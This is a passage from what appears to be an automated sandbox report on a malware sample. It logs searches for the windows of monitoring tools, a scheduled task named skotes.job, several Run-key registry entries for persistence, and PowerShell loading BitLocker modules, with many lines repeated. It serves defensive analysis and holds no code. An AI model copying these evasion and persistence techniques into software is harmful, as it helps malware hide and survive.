                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeWindow searched: window name: Filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeWindow searched: window name: Regmonclass
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ed7d415177.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ed7d415177.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d0e32932f8.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d0e32932f8.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bc893816fa.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bc893816fa.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6f3b41816f.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6f3b41816f.exeJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
